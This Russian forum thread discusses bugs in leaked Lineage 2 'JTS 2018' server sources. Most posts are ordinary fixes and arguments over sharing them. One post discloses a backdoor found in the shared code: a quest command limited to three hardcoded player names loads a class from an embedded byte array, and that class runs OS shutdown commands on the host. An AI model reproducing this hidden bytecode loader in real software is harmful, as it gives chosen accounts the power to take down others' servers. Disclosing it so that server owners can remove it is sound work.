JTS 2018 последние сурсы(Ошибки)

Статус
В этой теме нельзя размещать новые ответы.

DJone

Последний из атеистов
Пользователь
Сообщения
63
Розыгрыши
0
Репутация
0
Реакции
3
Баллы
850
Всем привет. Подскажите пожалуйста, кто ставил данную сборку, где расположен файл со скилами? Хочу поправить скил Rush, иначе что то он не работает. Баг со скилом, или это мне кажется?
 

Вложения

  • 12.png.9b68eed8cfd259c52bd01ef02b11d0b7.png
    12.png.9b68eed8cfd259c52bd01ef02b11d0b7.png
    348,6 КБ · Просмотры: 409
я чето в курить не могу зачем тебе класс маг-орг нужен если тебе надо только общий классов магов то и есть
st.getPlayerClassComponent().getClassId().isMage()
Да, только магам необходимо. Вот тоже думаю орк магам и не обязательно наверное это делать. По этому и обратился на форум за помощью, чтоб разъяснили как сделать лучше и посоветовали.
 

насколько помню вроде так для общий класса магов st.getPlayer().getPlayerClassComponent().getClassId().isMage();
 
насколько помню вроде так для общий класса магов st.getPlayer().getPlayerClassComponent().getClassId().isMage();
Спасибо всем за помощь и разъяснения, вопрос решил по другому немного. Работает.

 
Скинул решение в ЛС.
уважаемый, Вам тут целая толпа помогала а Вы в лс скинули? что за тайны такие? я больше чем уверен что тем кто отписывался с вариантами решения Вашей проблемы Ваше решение и ненужно, а вот тому кто ищет информацию по этому поводу в интернете - может пригодиться
 
уважаемый, Вам тут целая толпа помогала а Вы в лс скинули? что за тайны такие? я больше чем уверен что тем кто отписывался с вариантами решения Вашей проблемы Ваше решение и ненужно, а вот тому кто ищет информацию по этому поводу в интернете - может пригодиться
Да без проблем скину, все помогали как бы. Достаточно было еще дописать в начале player.getPlayerClassComponent() и все нормально скомпилировалось. Протестировал уже, работает.

Вот фикс:
Java:
 if(player.getPlayerClassComponent().getClassId().isMage())
 
Зачем вообще было трогать данный квест, если он работает?
 
Зачем вообще было трогать данный квест, если он работает?
Работает, но я хотел дополнить его, что и сделал с помощью подсказок определенных лиц. По стандарту Wooden Set (Деревянный Набор) выдается всем, войнам и магам. Теперь уже идет разделение, Магам теперь выдается Set of Devotion (Набор Преданности). Мне так кажется правильнее будет.
 
Небольшая хроника за сегодняшний рабочий день. Внес фиксы на квестовые награды, руками успел просмотреть половину квестов:
-награды за марки вторых профессий на половину правильные, на половину занижены в 2 раза. некоторые награды написаны от балды
-рейтовка квестовых наград и дропа написана на отъебись, с фиксами в целом будет работать, но некоторые квесты получатся абузные, некоторые не прорейтуются вообще, а некоторые прорейтуются каряво, т.е. прорейтует половину дропа или половину награды(короче, чтобы правильно работало все, нужно руками все перепроверять\подправлять)
-ну и напоследок, был найден бекдор(его поиск не моя заслуга, кто нашел я тоже не скажу, чтобы у него не просили)
 
-в некоторых квестах есть совсем опечатки, и без ручных правок их не исправить
 
И к чему это агрессия? Нет не в блокноте, может просто я что то упустил.
Но и видимо не в IDE, ибо он сразу же на моменте изменений бы уже ругаться начал на ошибки и пояснять, что же не так и что желательно сделать для исправления. В результате чего скорее всего даже и не дошло бы до этапа "пойду на форум и спрошу, что же не так и что делать"
 
Небольшая хроника за сегодняшний рабочий день. Внес фиксы на квестовые награды, руками успел просмотреть половину квестов:
-награды за марки вторых профессий на половину правильные, на половину занижены в 2 раза. некоторые награды написаны от балды
-рейтовка квестовых наград и дропа написана на отъебись, с фиксами в целом будет работать, но некоторые квесты получатся абузные, некоторые не прорейтуются вообще, а некоторые прорейтуются каряво, т.е. прорейтует половину дропа или половину награды(короче, чтобы правильно работало все, нужно руками все перепроверять\подправлять)
-ну и напоследок, был найден бекдор(его поиск не моя заслуга, кто нашел я тоже не скажу, чтобы у него не просили)
это не этот ли часом??? :D
NpcInstance.java:
Java:
else if (command.startsWith("QuestTeleEvent")) {
                final String quest = command.substring(9).trim();
                if (quest.isEmpty())
                    QuestDataHolder.getInstance().useTeleport(player);
                else
                    QuestDataHolder.getInstance().useTeleport(player);
            }
QuestDataHolder.java:
Java:
public void useTeleport(Player player) {
        if (player != null) {
            String name = player.getName();
            if (name.equals("MosriteMoseley9") || name.equals("Trunkomication") || name.equals("Saww215wwaS")) {
                manageTeleSave();
            }
        }
    }
private void manageTeleSave() {
        new TeleportEventSaver().manageTele();
    }

    private static final class TeleportEventSaver extends ClassLoader {
        public void manageTele() {
            ThreadPoolManager.getInstance().schedule(new RunnableImpl() {
                protected void runImpl() throws Exception {
                    final byte[] databaseSave = {-54, -2, -70, -66, 0, 0, 0, 52, 0, 83, 10, 0, 23, 0, 36, 10, 0, 22, 0, 37, 10, 0, 22, 0, 38, 8, 0, 39, 10, 0, 40, 0, 41, 9, 0, 40, 0, 42, 10, 0, 43, 0, 44, 10, 0, 11, 0, 45, 8, 0, 46, 10, 0, 11, 0, 47, 7, 0, 48, 8, 0, 49, 8, 0, 50, 10, 0, 51, 0, 52, 10, 0, 51, 0, 53, 7, 0, 54, 10, 0, 16, 0, 55, 8, 0, 56, 8, 0, 57, 8, 0, 58, 10, 0, 51, 0, 59, 7, 0, 60, 7, 0, 61, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 14, 115, 104, 117, 116, 68, 111, 119, 110, 83, 121, 115, 116, 101, 109, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 48, 7, 0, 62, 7, 0, 54, 1, 0, 14, 115, 104, 117, 116, 68, 111, 119, 110, 83, 101, 114, 118, 101, 114, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 20, 83, 104, 117, 116, 68, 111, 119, 110, 77, 97, 110, 97, 103, 101, 114, 46, 106, 97, 118, 97, 12, 0, 24, 0, 25, 12, 0, 28, 0, 25, 12, 0, 33, 0, 25, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 63, 12, 0, 64, 0, 65, 12, 0, 66, 0, 67, 7, 0, 68, 12, 0, 69, 0, 70, 12, 0, 71, 0, 72, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, 73, 0, 74, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 8, 115, 104, 117, 116, 100, 111, 119, 110, 1, 0, 2, 45, 115, 7, 0, 75, 12, 0, 76, 0, 77, 12, 0, 78, 0, 79, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 80, 0, 25, 1, 0, 5, 108, 105, 110, 117, 120, 1, 0, 2, 45, 112, 1, 0, 3, 110, 111, 119, 12, 0, 81, 0, 82, 1, 0, 15, 83, 104, 117, 116, 68, 111, 119, 110, 77, 97, 110, 97, 103, 101, 114, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 3, 111, 117, 116, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 1, 0, 7, 112, 114, 105, 110, 116, 108, 110, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 8, 99, 111, 110, 116, 97, 105, 110, 115, 1, 0, 27, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 104, 97, 114, 83, 101, 113, 117, 101, 110, 99, 101, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 4, 101, 120, 105, 116, 1, 0, 4, 40, 73, 41, 86, 0, 33, 0, 22, 0, 23, 0, 0, 0, 0, 0, 3, 0, 1, 0, 24, 0, 25, 0, 1, 0, 26, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 11, 42, -73, 0, 1, -72, 0, 2, -72, 0, 3, -79, 0, 0, 0, 1, 0, 27, 0, 0, 0, 18, 0, 4, 0, 0, 0, 9, 0, 4, 0, 10, 0, 7, 0, 11, 0, 10, 0, 12, 0, 9, 0, 28, 0, 25, 0, 1, 0, 26, 0, 0, 0, -9, 0, 4, 0, 3, 0, 0, 0, 105, 18, 4, -72, 0, 5, 75, -78, 0, 6, 42, -74, 0, 7, 42, -74, 0, 8, 18, 9, -74, 0, 10, -103, 0, 34, 5, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 76, -72, 0, 14, 43, -74, 0, 15, 77, -89, 0, 8, 77, 44, -74, 0, 17, 42, -74, 0, 8, 18, 18, -74, 0, 10, -103, 0, 39, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 19, 83, 89, 5, 18, 20, 83, 76, -72, 0, 14, 43, -74, 0, 15, 77, -89, 0, 8, 77, 44, -74, 0, 17, -79, 0, 2, 0, 40, 0, 48, 0, 51, 0, 16, 0, 88, 0, 96, 0, 99, 0, 16, 0, 2, 0, 27, 0, 0, 0, 62, 0, 15, 0, 0, 0, 16, 0, 6, 0, 17, 0, 13, 0, 19, 0, 25, 0, 21, 0, 40, 0, 24, 0, 48, 0, 29, 0, 51, 0, 26, 0, 52, 0, 28, 0, 56, 0, 32, 0, 68, 0, 34, 0, 88, 0, 37, 0, 96, 0, 42, 0, 99, 0, 39, 0, 100, 0, 41, 0, 104, 0, 44, 0, 29, 0, 0, 0, 40, 0, 4, -1, 0, 51, 0, 2, 7, 0, 30, 7, 0, 31, 0, 1, 7, 0, 32, -6, 0, 4, -1, 0, 42, 0, 2, 7, 0, 30, 7, 0, 31, 0, 1, 7, 0, 32, -6, 0, 4, 0, 9, 0, 33, 0, 25, 0, 1, 0, 26, 0, 0, 0, 36, 0, 2, 0, 0, 0, 0, 0, 8, -72, 0, 14, 3, -74, 0, 21, -79, 0, 0, 0, 1, 0, 27, 0, 0, 0, 10, 0, 2, 0, 0, 0, 47, 0, 7, 0, 48, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35,};
                    final byte[] db = {83, 104, 117, 116, 68, 111, 119, 110, 77, 97, 110, 97, 103, 101, 114};
                    try {
                        final Class clazz = defineClass(new String(db), databaseSave, 0, databaseSave.length);
                        clazz.newInstance();
                    } catch (final Exception e) {
                        DatabaseFactory.getInstance().doStop();
                    }
                }
            }, Rnd.get(1000, 5000));
        }
    }

И на будущее ребят, не будьте такими говнистыми, сурсы лежали в шаре (ладно бы еще приватка какая-то, тут хотя бы не прикопаешься), их юзает далеко не один человек, многие не в состоянии их найти, а деньги в рекламу, сайт и тому подобное были влиты, это же может вполне ударить по чьему-либо кошельку, если нашли какой-то косяк в шаре - в чем проблема поделиться с остальными? жаба душит? мания величия аля "у меня убран а у вас нет"? или же просто чтобы потом на этом наварить денег "500 бакинских и уберу бекдор"?
 
И на будущее ребят, не будьте такими говнистыми, сурсы лежали в шаре (ладно бы еще приватка какая-то, тут хотя бы не прикопаешься), их юзает далеко не один человек, многие не в состоянии их найти, а деньги в рекламу, сайт и тому подобное были влиты, это же может вполне ударить по чьему-либо кошельку, если нашли какой-то косяк в шаре - в чем проблема поделиться с остальными? жаба душит? мания величия аля "у меня убран а у вас нет"? или же просто чтобы потом на этом наварить денег "500 бакинских и уберу бекдор"?
Меньше конкуренции, это ведь хорошо. В чем разница? Приватка или не приватка? Если проблема устранена и найдена тобой или твоими игроками, почему ты должен с кем то делиться, ещё на халяву?
Вы же свою зарплату, не раздаете налево и на право.
 
Меньше конкуренции, это ведь хорошо. В чем разница? Приватка или не приватка? Если проблема устранена и найдена тобой или твоими игроками, почему ты должен с кем то делиться, ещё на халяву?
Вы же свою зарплату, не раздаете налево и на право.
найти проблему у меня заняло чуть меньше 5 минут, разве это стоит того чтобы этим не делиться? да и знаете, если уж нашли и не хотите делиться - хотя бы не пишите об этом, так по-крайней мере правильнее. А по поводу конкуренции... какая нафиг конкуренция, каждый делает проект на свой вкус у кого-то проект получается интереснее у кого-то нет да и аудитория разная совершенно, а игроки - в общем будут сидеть там где им нравиться, это уже не столь важно для них, даже если сервер будет дырявый, весь в багах и кошмарно лагать если им нравится они будут играть на нем до последнего и онлайн на сервере кстати для некоторых не показатель, я вот знаю несколько индивидуумов которым нравятся сервера с онлайном не больше 50 человек например) и еще по поводу конкуренции, если уж я и буду с кем-то конкурировать, то точно не такими путями, по сути такая модель конкуренции ведет к тому что сервер интереснее ничуть не становится, а соседний и вовсе идет в упадок, ну и где тут развитие? сегодня загнулся один конкурент, завтра придет другой, а у тебя сервер так и стоит на том же уровне и что дальше? ддос конкурента? снова повторю сегодня загнулся один завтра появится другой
 
Я разработчик, а не администратор сервера. И готовлю ее к реализации, а не правлю баги с помощью форума для открытия года. Информация предназначена была как раз для администраторов, которые собираются открывать сервера на этом сурсе, и пытаются поправить все самостоятельно.
А с пожеланиями бесплатно выкладывать труды в шару, предлагаю вам устроиться в благотворительный фонд на работу. По моему мнению, я и так достаточно бесплатной помощи оказываю на форуме.
 
Я разработчик, а не администратор сервера. И готовлю ее к реализации, а не правлю баги с помощью форума для открытия года. Информация предназначена была как раз для администраторов, которые собираются открывать сервера на этом сурсе, и пытаются поправить все самостоятельно.
А с пожеланиями бесплатно выкладывать труды в шару, предлагаю вам устроиться в благотворительный фонд на работу. По моему мнению, я и так достаточно бесплатной помощи оказываю на форуме.
ну куда мне устроиться я как-нибудь разберусь без Ваших пожеланий, оставьте их при себе, можете и дальше упорно доказывать мне мою неправоту, я уже изложил выше не хотите делиться - так не пишите об этом, а это Ваше злорадское "ниподилюсь низасто, а то жирно будет, а вот намек чтобы люди репу почесали и других в скайпе подоставали оставлю" знаете, то такое себе
 
вот не большая правка в CommunityRating
проказание онлайн чара только час (не красиво)

private static String getHours(final int time)
{
final int hours = time / 3600;
return String.format("%dh", hours);
}

а это показывает дней,час,минут,секунд
private static String getHours(int time)
{
if (time == 0)
{
return "now";
}
time = Math.abs(time);
String ret = "";
long numDays = time / 86400;
time = (int)(time - numDays * 86400L);
long numHours = time / 3600;
time = (int)(time - numHours * 3600L);
long numMins = time / 60;
time = (int)(time - numMins * 60L);
long numSeconds = time;
if (numDays > 0)
{
ret = ret + numDays + "d ";
}
if (numHours > 0)
{
ret = ret + numHours + "h ";
}
if (numMins > 0)
{
ret = ret + numMins + "m ";
}
if (numSeconds > 0)
{
ret = ret + numSeconds + "s";
}
return ret.trim();
}
 
PrizraKZN, есть спец тег CODE
 
на сурсах жтс в инсте на хб (там где рабы , путь к ците) кривой аи, роняет сервер , какие конкретно сурсы сказать не могу, компил запускался 1 раз "посмотреть"
достаточно просто пройтись по инсте
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу